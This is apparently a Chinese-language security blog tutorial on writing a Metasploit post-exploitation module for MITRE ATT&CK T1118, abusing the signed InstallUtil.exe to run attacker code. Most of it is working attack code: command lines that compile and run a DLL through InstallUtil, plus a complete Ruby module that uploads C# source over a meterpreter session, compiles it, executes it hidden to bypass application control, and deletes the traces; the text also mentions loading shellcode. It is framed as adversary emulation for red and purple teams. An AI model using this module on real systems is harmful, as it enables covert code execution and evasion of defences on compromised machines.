技术分享丨Metasploit后渗透模块编写ATT&CK-T1118

一. T1118

攻击者可以使用InstallUtil通过受信任的Windows实用工具代理代码执行。InstallUtil是一个命令行实用程序，通过执行.NET二进制文件中指定的特定安装程序组件，允许安装和卸载资源。（引用：MSDN InstallUtil）InstallUtil由Microsoft数字签名，位于Windows系统上的.NET目录中：C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe“C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe通过在二进制文件中使用执行用属性装饰的类的属性，InstallUtil也可以用于绕过应用程序控制[System.ComponentModel.RunInstaller(true)]

二. T1118-POC

InstallUtil HelpText方法调用

第一步:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs

第二步:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll

HelpText 调用:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? T1118.dll

三. 开始编写模块

思路流程：由于t1118属于后渗透阶段，我们为其在获取session会话的时候进行以下操作

1.上传源代码

2.csc编译dll

3.InstallUtil.exe调用加载dll

需要定义设置的参数：

1.本地C#源码

2.上传windows的路径

3.dotnet的版本

我们在/usr/share/metasploit-framework/modules/post/windows/和/usr/share/metasploit-framework/data/文件夹中新建一个文件夹本文命名为tianyu，在这个文件夹中用于存放关于att&ck相关的攻击模块。然后新建一个ruby文件，为其命名为t1118.rb

1、初始化模块

参考官方编写模块 https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module

定义初始化info信息

设置参数

OptString.new( 'RFILE', [false, '上传到windows路径','C:\\windows\\temp\\t1118.tmp' ]),OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs") ]),OptBool.new('CLEANUP_FILE', [ true, "清理文件", true]),OptString.new('DOTNET_VERSION', [true, 'DotNet Version','v4.0.30319' ]),

定义使用run命令执行的内容。

def runbeginreturn 0 if session.type != "meterpreter"print_good("模块T1118执行成功")rescue ::Exception => eprint_status("Unable to execute: #{e.message}")print_error("模块T1118执行失败")returnendend

2、定义本地文件和上传文件

定义remote_file和local_file 对 datastore[‘RFILE’]和 datastore[‘LFILE’]取值

def remote_fileif datastore['RFILE'].blank?remote_name = File.basename(datastore['LFILE'])elseremote_name = datastore['RFILE']endremote_nameenddef local_filedatastore['LFILE']end

3、删除上传的源代码

def clean_fileprint_status("Removing files...")register_file_for_cleanup(datastore['RFILE'])end

4、定义CMD的命令

使用run_cmd 运行命令

def run_cmd(user_cmd,io=true)cmd = "cmd /c #{user_cmd}"beginprint_status("Executing '#{cmd}' on #{session.inspect}")if iores = cmd_exec(cmd)if resprint_warning(res)endelseres = session.sys.process.execute(cmd, nil, {'Hidden' => true})endrescue ::Exception => eprint_error("Unable to execute: #{e.message}")returnendend

5、上传文件和命令执行

该步骤为以下内容

1）上传本地的/usr/share/metasploit-framework/data/tianyu/t1118/t1118.cs文件到C:\windows\temp\t1118.tmp

2）使用csc.exe 对t1118.tmp 进行编译

3）使用InstallUtil对编译后的dll进行调用

4）删除源文件

def runbeginreturn 0 if session.type != "meterpreter"rfile = remote_file()lfile = local_file()dotnet_version = datastore['DOTNET_VERSION']base = 'C:\Windows\Microsoft.NET\Framework'csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'upload_file(rfile, lfile)cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile})print_status("Compiling...")run_cmd(cmd)#C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cssleep(2)cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll")#C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dllprint_status("Executing InstallUtil...")run_cmd(cmd,false)print_good("模块T1118执行成功")sleep(2)clean_file()print_good("清理缓存成功")rescue ::Exception => eprint_status("Unable to execute: #{e.message}")print_error("模块T1118执行失败")returnendend

t1118整体加载模块初始设置

poc 运行后

poc 填入shellcode 运行后

demo演示

四. 完整代码

添加库路径/usr/share/metasploit-framework/lib/msf/core/post/windows.rb

require 'msf/core/post/windows/tianyu'

定义库文件/usr/share/metasploit-framework/lib/msf/core/post/windows/tianyu.rb

# -*- coding: binary -*-module Msfclass Postmodule Windowsmodule Tianyu#上传文件def remote_fileif datastore['RFILE'].blank?remote_name = File.basename(datastore['LFILE'])elseremote_name = datastore['RFILE']endremote_nameend#本地文件def local_filedatastore['LFILE']end#清理文件def clean_fileprint_status("Removing files...")register_file_for_cleanup(datastore['RFILE'])end#运行cmd 命令def run_cmd(user_cmd,io=true)cmd = "cmd /c #{user_cmd}"beginprint_status("Executing '#{cmd}' on #{session.inspect}")if iores = cmd_exec(cmd)if resprint_warning(res)endelseres = session.sys.process.execute(cmd, nil, {'Hidden' => true})endrescue ::Exception => eprint_error("Unable to execute: #{e.message}")returnendendend # Tianyuend # Windowsend # Postend # Msf

模块文件 /usr/share/metasploit-framework/modules/post/windows/tianyu/t1118.rb

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Postinclude Msf::Post::Fileinclude Exploit::FileDropperinclude Post::Windows::Tianyudef initialize(info={})super(update_info(info,'Name'          => 'InstallUtil (T1118) Windows','Description'   => %q{ATT&CK 模块编写 T1118  },'License'       => MSF_LICENSE,'Author'        => [ '天虞实验室-demon' ],'References'    => [ [ 'URL', 'https://attack.mitre.org/wiki/Technique/T1118' ],[ 'URL', 'https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118' ],[ 'URL', 'https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260'  ],[ 'URL', 'https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb' ] ],'Platform'      => [ 'win' ],'SessionTypes'  => [ 'meterpreter' ]))register_options([OptString.new( 'RFILE', [false, '上传到windows路径','C:\\windows\\temp\\t1118.tmp' ]),OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs") ]),OptBool.new('CLEANUP_FILE', [ true, "清理文件", true]),OptString.new('DOTNET_VERSION', [true, 'DotNet Version','v4.0.30319' ]),])enddef runbeginreturn 0 if session.type != "meterpreter"rfile = remote_file()lfile = local_file()dotnet_version = datastore['DOTNET_VERSION']base = 'C:\Windows\Microsoft.NET\Framework'csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'upload_file(rfile, lfile)cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile})print_status("Compiling...")run_cmd(cmd)sleep(2)cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll")print_status("Executing InstallUtil...")run_cmd(cmd,false)print_good("模块T1118执行成功")sleep(2)clean_file()print_good("清理缓存成功")rescue ::Exception => eprint_status("Unable to execute: #{e.message}")print_error("模块T1118执行失败")returnendendend